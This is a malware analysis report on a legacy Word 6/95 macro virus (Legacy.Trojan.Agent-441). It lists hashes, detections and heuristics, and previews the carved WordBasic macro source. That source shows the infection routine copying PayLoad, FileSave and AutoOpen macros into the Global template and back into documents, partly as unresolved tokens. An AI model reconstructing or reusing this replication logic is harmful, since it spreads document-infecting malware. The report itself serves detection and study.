Legacy.Trojan.Agent-441 — Office (OLE) malware analysis

Static analysis result for SHA-256 9b985436c743730a…

MALICIOUS

Office (OLE)

7.5 KB First seen: 2012-06-14
MD5: 3c8780f6802fc0a84c9f7704068fa2f1 SHA-1: 5672223efb02f63e2cb8d871c5c2ec14233584ec SHA-256: 9b985436c743730aab2965611209a909977e5fb4bf39bc9f2f192ecb185b98b4
102 Risk Score

Malware Insights

Legacy.Trojan.Agent-441 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic

The file exhibits characteristics of a legacy macro virus, specifically identified as 'Legacy.Trojan.Agent-441' by ClamAV. The document body contains numerous strings related to macro execution, infection routines, and payload delivery, including references to 'RSN MACRO VIRUS' and functions like 'AutoOpen' and 'PayLoad'. This suggests the file is designed to execute malicious code via macros and potentially infect other documents.

Heuristics 3

  • ClamAV: Legacy.Trojan.Agent-441 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Legacy.Trojan.Agent-441
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • Recovered legacy WordBasic macro source info OLE_LEGACY_WORDBASIC_MACRO_SOURCE
    The Word 6.0/95 document stores tokenised WordBasic macros in the WordDocument stream rather than as a modern VBA project, so VBA source extraction cannot see them. The macro source was detokenised and carved so its identifiers, string literals (file paths, URLs, registry keys, message text) and comments are available for review and signature scanning.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
wordbasic_macros.txt wordbasic-macro analyzer.wordbasic (detokenised Word 6/95 WordBasic macro source) 1598 bytes
SHA-256: b217a8b310b3a4f3db9e6e329d8193e5526a848fc0496fd0194c9f4d8a6c2f76
Preview script
First 1,000 lines of the extracted script
= * =
=
MAIN
, - * Abort
iMacroCount = @cmd80b7 0 , 0
i = 1 iMacroCount
@cmd80b8 i , 0 , 0 = "PayLoad"
bInstalled = 1
@cmd80b8 i , 0 , 0 = "FileSave"
bTooMuchTrouble = 1
i
bInstalled bTooMuchTrouble
iWW6IInstance = @cmd8006 @cmd814d "WW6Infector"
sMe$ = @cmd8025
sMacro$ = sMe$ = ":Payload"
@cmd80c2 sMacro$ , "Global:PayLoad"
sMacro$ = sMe$ = ":AAZFS"
@cmd80c2 sMacro$ , "Global:FileSave"
sMacro$ = sMe$ = ":AAZFS"
@cmd80c2 sMacro$ , "Global:AAZFS"
sMacro$ = sMe$ = ":AAZAO"
@cmd80c2 sMacro$ , "Global:AAZAO"
  21349 @cmd2220 ,     +  
  @cmd6f42     +  
MAIN
dlg @cmd0054
, - * bail
dlg
  26479  
25703 dlg = 0 dlg = 1
sMe$ = @cmd8025
sTMacro$ = sMe$ = ":AutoOpen"
@cmd80c2 "Global:AAZAO" , sTMacro$
sTMacro$ = sMe$ = ":AAZAO"
@cmd80c2 "Global:AAZAO" , sTMacro$
sTMacro$ = sMe$ = ":AAZFS"
@cmd80c2 "Global:AAZFS" , sTMacro$
sTMacro$ = sMe$ = ":PayLoad"
@cmd80c2 "Global:PayLoad" , sTMacro$
@cmd0054 dlg
* Done
25625 Err = 509
* Done
Err 102
@cmd80f2 @cmd8101 = 13
@cmd80f8 @cmd8101 = 6
@cmd01f7 = "haifa" , = 0 , = 0
Err 102
@cmd0054 dlg
MAIN
=    
MAIN
, - * Abort
iMacroCount = @cmd80b7 0 , 0
i = 1 iMacroCount
@cmd80b8 i , 0 , 0 = "PayLoad"
bInstalled = 1
@cmd80b8 i , 0 , 0 = "FileSave"
bTooMuchTrouble = 1
i
bInstalled bTooMuchTrouble
iWW6IInstance = @cmd8006 @cmd814d "WW6Infector"
sMe$ = @cmd8025
sMacro$ = sMe$ = ":Payload"
@cmd80c2 sMacro$ , "Global:PayLoad"
sMacro$ = sMe$ = ":AAZFS"
@cmd80c2 sMacro$ , "Global:FileSave"
sMacro$ = sMe$ = ":AAZFS"
@cmd80c2 sMacro$ , "Global:AAZFS"
sMacro$ = sMe$ = ":AAZAO"
@cmd80c2 sMacro$ , "Global:AAZAO"
  21349 @cmd2220 ,     +  
  @cmd6f42     +